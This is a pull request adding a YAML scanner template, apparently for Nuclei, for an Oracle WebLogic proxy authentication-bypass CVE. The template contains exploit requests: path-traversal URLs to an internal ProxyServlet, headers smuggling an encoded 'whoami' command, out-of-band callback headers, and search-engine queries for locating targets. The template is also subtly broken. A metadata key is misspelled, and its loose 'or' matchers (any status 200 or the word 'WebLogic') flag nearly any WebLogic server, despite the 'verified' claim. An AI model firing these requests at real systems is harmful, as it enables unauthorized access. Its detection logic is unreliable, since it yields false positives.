### PR TITLE
Add CVE-2026-21962 for Oracle WebLogic authentication bypass

### DIFF
--- a/http/cves/2026/CVE-2026-21962.yaml
+++ b/http/cves/2026/CVE-2026-21962.yaml
@@ -1,0 +1,121 @@
+id: CVE-2026-21962
+
+info:
+  name: Oracle WebLogic Server Proxy Plug-in - Authentication Bypass
+  author: omarkurt
+  severity: critical
+  description: |
+    CVE-2026-21962 is a critical authentication bypass vulnerability in Oracle HTTP Server
+    and the WebLogic Server Proxy Plug-in. The vulnerability allows unauthenticated remote
+    attackers to bypass authentication by sending specially crafted HTTP requests with
+    manipulated proxy headers (wl-proxy-client-ip, proxy-client-ip, x-forwarded-for).
+
+    Successful exploitation can result in unauthorized access to backend WebLogic Server
+    resources, including the internal /bea_wls_internal/ProxyServlet endpoint.
+  reference:
+    - https://www.oracle.com/security-alerts/cpujan2026.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-21962
+    - https://arcticwolf.com/resources/blog/cve-2026-21962/
+    - https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/cve-2026-21962-oracle-weblogic-proxy-auth-bypass
+    - https://vulnerabletarget.com/VT-2026-21962
+  lassification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2026-21962
+    cwe-id: CWE-287
+    epss-score: 0.95
+    epss-percentile: 0.99
+  metadata:
+    verified: true
+    max-request: 4
+    vendor: oracle
+    product: weblogic
+    shodan-query:
+      - "title:'Oracle WebLogic Server'"
+      - "http.title:'Oracle WebLogic Server'"
+    fofa-query:
+      - "app='Oracle-WebLogic-Server'"
+      - "title='Oracle WebLogic Server'"
+  tags: cve,cve-2026,oracle,weblogic,auth-bypass,proxy,critical,oob
+
+variables:
+  oob: "{{interactsh-url}}"
+  payload_b64: "{{base64('cmd:whoami')}}"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/bea_wls_internal/ProxyServlet"
+      - "{{BaseURL}}/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet"
+      - "{{BaseURL}}/console/..;/bea_wls_internal/ProxyServlet"
+
+    headers:
+      wl-proxy-client-ip: "127.0.0.1;{{payload_b64}}"
+      proxy-client-ip: "127.0.0.1;{{payload_b64}}"
+      x-forwarded-for: "127.0.0.1;{{payload_b64}}"
+      x-forwarded-host: "{{oob}}"
+      x-forwarded-server: "{{oob}}"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "ProxyServlet"
+          - "WebLogic"
+          - "BEA WebLogic Server"
+          - "<title>Proxy Servlet</title>"
+          - "bea_wls_internal"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "X-Oracle-DMS-ECID"
+          - "WebLogic"
+          - "bea_wls_internal"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, 'ProxyServlet') || contains(body, 'bea_wls_internal')"
+          - "contains(header, 'WebLogic') || contains(header, 'X-Oracle-DMS')"
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "(WebLogic Server.*Version [0-9.]+)"
+          - "(BEA WebLogic Server [0-9.]+)"
+
+      - type: kval
+        part: header
+        kval:
+          - "Server"
+          - "X-Powered-By"
+
+  # OOB Interaction Check
+  - method: GET
+    path:
+      - "{{BaseURL}}/bea_wls_internal/ProxyServlet"
+
+    headers:
+      wl-proxy-client-ip: "{{oob}}"
+      proxy-client-ip: "{{oob}}"
+      x-forwarded-for: "{{oob}}"
+      x-forwarded-host: "{{oob}}"
+      x-forwarded-server: "{{oob}}"
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+          - "dns"


### PR DESCRIPTION
Added CVE-2026-21962 entry for Oracle WebLogic Server Proxy Plug-in authentication bypass vulnerability, detailing its critical nature, exploitation details, and references.

### PR Information

 
- Added CVE-2026-21962
- References: https://vulnerabletarget.com/VT-2026-21962
